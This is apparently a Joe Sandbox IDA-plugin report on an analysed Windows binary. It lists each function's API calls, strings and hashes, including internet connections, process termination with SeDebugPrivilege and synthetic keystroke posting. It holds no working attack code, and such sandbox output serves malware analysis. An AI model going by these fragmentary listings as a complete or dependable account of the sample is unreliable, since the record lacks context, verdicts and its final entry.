                                                                • API String ID: 858772685-4153970271
                                                                • Opcode ID: 26a3a75ed79529191aa8a7913a211324d7229ef1e3a3c450db410cfb78065874
                                                                • Instruction ID: 63fe143c677f1d9655ab7cc246022260f11e3aefd5d6f3985f756100ff289c9a
                                                                • Opcode Fuzzy Hash: 26a3a75ed79529191aa8a7913a211324d7229ef1e3a3c450db410cfb78065874
                                                                • Instruction Fuzzy Hash: 0321917180021AFBDF11AF90CC1AEEE7775FF18340F044426F619620A2EB79A658DB60
                                                                APIs
                                                                • GetParent.USER32 ref: 007720AB
                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 007720C0
                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0077214D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameParentSend
                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                • API String ID: 1290815626-3381328864
                                                                • Opcode ID: df633578cf622d63d50d479da97db8c293ccd2fc5e735c9d4a595c9b2db204c6
                                                                • Instruction ID: 468c0601891aae59edc9cdcaa6a6fac9484dac1266361fa21c9e29455dd385c1
                                                                • Opcode Fuzzy Hash: df633578cf622d63d50d479da97db8c293ccd2fc5e735c9d4a595c9b2db204c6
                                                                • Instruction Fuzzy Hash: F51129B668870EFAFE056624DC0BDA637ACEB05364F608117FB18B51D3FE6D68035618
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                • String ID:
                                                                • API String ID: 1282221369-0
                                                                • Opcode ID: b8cad544439ee4336c01ba18c3151f41a0173d61557f25fc7d45911c86d2259f
                                                                • Instruction ID: 8f3c71c923197a8a6a034b36ddb193dd0a9dcdd40d60a8691aa195c04a01bf6c
                                                                • Opcode Fuzzy Hash: b8cad544439ee4336c01ba18c3151f41a0173d61557f25fc7d45911c86d2259f
                                                                • Instruction Fuzzy Hash: 61616B73A06340EFDF22AFB49C89A6E7BA5EF05310F04416DF940AB252DB7D9D4587A0
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00766890
                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007668A9
                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007668B9
                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007668D1
                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007668F2
                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00728874,00000000,00000000,00000000,000000FF,00000000), ref: 00766901
                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0076691E
                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00728874,00000000,00000000,00000000,000000FF,00000000), ref: 0076692D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                • String ID:
                                                                • API String ID: 1268354404-0
                                                                • Opcode ID: 2efea9f047332c8f8c57a0e0634f5859b518b1948e7b0b0bebc4cd87f458848f
                                                                • Instruction ID: c322a1d137ec193d85169d28f928d754c2731438a3aeb6a7035f8a9607823914
                                                                • Opcode Fuzzy Hash: 2efea9f047332c8f8c57a0e0634f5859b518b1948e7b0b0bebc4cd87f458848f
                                                                • Instruction Fuzzy Hash: E35178B0A01209EFDB20CF24DC95FAA7BB5FB88750F14851CF916972A0DB79E990DB50
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0078C182
                                                                • GetLastError.KERNEL32 ref: 0078C195
                                                                • SetEvent.KERNEL32(?), ref: 0078C1A9
                                                                  • Part of subcall function 0078C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0078C272
                                                                  • Part of subcall function 0078C253: GetLastError.KERNEL32 ref: 0078C322
                                                                  • Part of subcall function 0078C253: SetEvent.KERNEL32(?), ref: 0078C336
                                                                  • Part of subcall function 0078C253: InternetCloseHandle.WININET(00000000), ref: 0078C341
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                • String ID:
                                                                • API String ID: 337547030-0
                                                                • Opcode ID: a86942dbc3231edef32a4409d5029b58db770a4abeb3eb23d5199aa6647ae432
                                                                • Instruction ID: 85922222b3b36ceea9b08277edfb018b42acbed4a27901c3a23637768fe4fec0
                                                                • Opcode Fuzzy Hash: a86942dbc3231edef32a4409d5029b58db770a4abeb3eb23d5199aa6647ae432
                                                                • Instruction Fuzzy Hash: 43318C71640605BFDB23AFB5DC48A66BBF8FF59300B04841DF95686660DB39E8149BB0
                                                                APIs
                                                                  • Part of subcall function 00773A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00773A57
                                                                  • Part of subcall function 00773A3D: GetCurrentThreadId.KERNEL32 ref: 00773A5E
                                                                  • Part of subcall function 00773A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007725B3), ref: 00773A65
                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007725BD
                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007725DB
                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007725DF
                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007725E9
                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00772601
                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00772605
                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0077260F
                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00772623
                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00772627
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                • String ID:
                                                                • API String ID: 2014098862-0
                                                                • Opcode ID: bcd81176dd1d628cfd7623935c5363bd69ec4795edef0e17b5502f1dba743bc2
                                                                • Instruction ID: f349deb9227eaa5c586b99ac1e2baa8a9e0ed3f947f17a84d099687f19856b23
                                                                • Opcode Fuzzy Hash: bcd81176dd1d628cfd7623935c5363bd69ec4795edef0e17b5502f1dba743bc2
                                                                • Instruction Fuzzy Hash: DA01D471390214BBFB106768DC8FF593F59DB8EB52F108041F328AE0D1C9EA28459E6D
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00771449,?,?,00000000), ref: 0077180C
                                                                • HeapAlloc.KERNEL32(00000000,?,00771449,?,?,00000000), ref: 00771813
                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00771449,?,?,00000000), ref: 00771828
                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00771449,?,?,00000000), ref: 00771830
                                                                • DuplicateHandle.KERNEL32(00000000,?,00771449,?,?,00000000), ref: 00771833
                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00771449,?,?,00000000), ref: 00771843
                                                                • GetCurrentProcess.KERNEL32(00771449,00000000,?,00771449,?,?,00000000), ref: 0077184B
                                                                • DuplicateHandle.KERNEL32(00000000,?,00771449,?,?,00000000), ref: 0077184E
                                                                • CreateThread.KERNEL32(00000000,00000000,00771874,00000000,00000000,00000000), ref: 00771868
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                • String ID:
                                                                • API String ID: 1957940570-0
                                                                • Opcode ID: 5df737b31a9b1c9511d4f859aa5092f8466e04aa022ca3f9bd325a26d7da0bda
                                                                • Instruction ID: 87898c13a66add17a974d5164bee916431b6f46fe9492503eb0096984702e29c
                                                                • Opcode Fuzzy Hash: 5df737b31a9b1c9511d4f859aa5092f8466e04aa022ca3f9bd325a26d7da0bda
                                                                • Instruction Fuzzy Hash: AC01ACB5340308BFE611ABA5DC4AF573BACEB8AB11F418411FA05DB191DA7498008B25
                                                                APIs
                                                                  • Part of subcall function 0077D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0077D501
                                                                  • Part of subcall function 0077D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0077D50F
                                                                  • Part of subcall function 0077D4DC: CloseHandle.KERNEL32(00000000), ref: 0077D5DC
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079A16D
                                                                • GetLastError.KERNEL32 ref: 0079A180
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079A1B3
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0079A268
                                                                • GetLastError.KERNEL32(00000000), ref: 0079A273
                                                                • CloseHandle.KERNEL32(00000000), ref: 0079A2C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 2533919879-2896544425
                                                                • Opcode ID: 175ab9c03d53d0acca7d36614712d5a1daaf373e4baed2434e60fcdfa6d97dea
                                                                • Instruction ID: 84648d28c6efe1296582c53bcaa36a178e6a4445885b19195b87d3ebb621ee05
                                                                • Opcode Fuzzy Hash: 175ab9c03d53d0acca7d36614712d5a1daaf373e4baed2434e60fcdfa6d97dea
                                                                • Instruction Fuzzy Hash: A461AF71209241AFDB20DF18D498F15BBE1AF84318F18848CE4664B7A3C77AEC85CBD2
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007A3925
                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007A393A
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007A3954
                                                                • _wcslen.LIBCMT ref: 007A3999
                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 007A39C6
                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007A39F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window_wcslen
                                                                • String ID: SysListView32
                                                                • API String ID: 2147712094-78025650
                                                                • Opcode ID: d756ce45eaa60cdf7b18a02cb6bcf03caf9d70a92634e29fafa0fd87611293a5
                                                                • Instruction ID: 2d1d3c296e243c2087eee341f568cc2062283eed0b45ecc767097bedb288c194
                                                                • Opcode Fuzzy Hash: d756ce45eaa60cdf7b18a02cb6bcf03caf9d70a92634e29fafa0fd87611293a5
                                                                • Instruction Fuzzy Hash: 5F41C671A00218BBEF21DF64CC49FEA77A9EF49354F100226F958E7281D7799E80CB90
                                                                APIs
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0077BCFD
                                                                • IsMenu.USER32(00000000), ref: 0077BD1D
                                                                • CreatePopupMenu.USER32 ref: 0077BD53
                                                                • GetMenuItemCount.USER32(012F55D0), ref: 0077BDA4
                                                                • InsertMenuItemW.USER32(012F55D0,?,00000001,00000030), ref: 0077BDCC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                • String ID: 0$2
                                                                • API String ID: 93392585-3793063076
                                                                • Opcode ID: 709c07dc7a65a1a3da338779e45787830b191d7086e5a438020e98173b439735
                                                                • Instruction ID: 043329400da1f108a0cee8bdc7de2762ec673f105c2d9153dcd542e9d413edc9
                                                                • Opcode Fuzzy Hash: 709c07dc7a65a1a3da338779e45787830b191d7086e5a438020e98173b439735
                                                                • Instruction Fuzzy Hash: 03518070B00305EFDF25CFA8D888BAEBBF4AF45394F24C169E41997291D778A941CB61
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 00732D4B
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00732D53
                                                                • _ValidateLocalCookies.LIBCMT ref: 00732DE1
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00732E0C
                                                                • _ValidateLocalCookies.LIBCMT ref: 00732E61
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: &Hs$csm
                                                                • API String ID: 1170836740-1354961900
                                                                • Opcode ID: 0207d7eaccc7ae423911718996c31001eb868b48f4ed3b4653b238bda937314e
                                                                • Instruction ID: cbf83cd26fe9113664fd4031fe5b3581529f6dfd4801e48612d675d9881b3f06
                                                                • Opcode Fuzzy Hash: 0207d7eaccc7ae423911718996c31001eb868b48f4ed3b4653b238bda937314e
                                                                • Instruction Fuzzy Hash: EE419374A10209EBDF10DF68C849A9EBBB5BF44324F148155E915AB353D739EA06CBE0
                                                                APIs
                                                                • LoadIconW.USER32(00000000,00007F03), ref: 0077C913
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: IconLoad
                                                                • String ID: blank$info$question$stop$warning
                                                                • API String ID: 2457776203-404129466
                                                                • Opcode ID: b3004f869a13d7faeaeaff0e4f2bf438feaea3cc9ef7cba6cdec3223dfc8e256
                                                                • Instruction ID: daa68b2b1e5c4ac8de3066ee2b5346ae93924b72dbad2f4af70c1fb0b1e87d64
                                                                • Opcode Fuzzy Hash: b3004f869a13d7faeaeaff0e4f2bf438feaea3cc9ef7cba6cdec3223dfc8e256
                                                                • Instruction Fuzzy Hash: 9011EE3168930AFEEB065B549C82CDA67ACDF193A4B10842FF508A5282D76C7D005669
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$LocalTime
                                                                • String ID:
                                                                • API String ID: 952045576-0
                                                                • Opcode ID: 374e45c2ede5f48277fa5513aac3a517a23a8a33dfd6ae53a2db0396b6dcbae7
                                                                • Instruction ID: d27baaf659fcf280150b40660b486edef22881bc1c04af6a2d0cfec3c3412e67
                                                                • Opcode Fuzzy Hash: 374e45c2ede5f48277fa5513aac3a517a23a8a33dfd6ae53a2db0396b6dcbae7
                                                                • Instruction Fuzzy Hash: 80419666C10118B5EB21EBF4888EACF77A8AF49710F508462F518E3123FB3CE655C3A5
                                                                APIs
                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 0072F953
                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 0076F3D1
                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 0076F454
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ShowWindow
                                                                • String ID:
                                                                • API String ID: 1268545403-0
                                                                • Opcode ID: 0181240a7d32f1a239a6565589521c509766db7eb923d938e15fa7cedbe97c8f
                                                                • Instruction ID: aaa872d5f42dd3b604d00f0b5aafbc98e9c0a6addc0113da47d67118295efcad
                                                                • Opcode Fuzzy Hash: 0181240a7d32f1a239a6565589521c509766db7eb923d938e15fa7cedbe97c8f
                                                                • Instruction Fuzzy Hash: AE410A31608690BEC7399B2DF88872A7BB5AB96314F54843DE4C7D6661DA3DB8C0CB11
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 007A2D1B
                                                                • GetDC.USER32(00000000), ref: 007A2D23
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A2D2E
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 007A2D3A
                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007A2D76
                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007A2D87
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 007A2DC2
                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007A2DE1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                • String ID:
                                                                • API String ID: 3864802216-0
                                                                • Opcode ID: 6ba767d388ac09378804cf26e1d44bdc63c3a23a752d26f7c916e672b321e3ed
                                                                • Instruction ID: 7d7bd8a1d2d54d25b90b6c3c2c37ea6c3335fd060f2ce4f3bc0291cfc67eaf5c
                                                                • Opcode Fuzzy Hash: 6ba767d388ac09378804cf26e1d44bdc63c3a23a752d26f7c916e672b321e3ed
                                                                • Instruction Fuzzy Hash: 9A318072201214BFEB158F54CC89FEB3FADEF8A715F048155FE089A292C6799C51C7A4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _memcmp
                                                                • String ID:
                                                                • API String ID: 2931989736-0
                                                                • Opcode ID: 1f48fc5ac123f200f7c0f433b8038486604562e021d690073858156da749252e
                                                                • Instruction ID: 9f5cdf6266d20c1969ab24c6d755083bde103c94d6bdaed90506daffad9363ad
                                                                • Opcode Fuzzy Hash: 1f48fc5ac123f200f7c0f433b8038486604562e021d690073858156da749252e
                                                                • Instruction Fuzzy Hash: 6821FCA1740A09B7EA1857218D82FFA335CAF517D4F848120FD0CDA542F7ADEE1082F5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
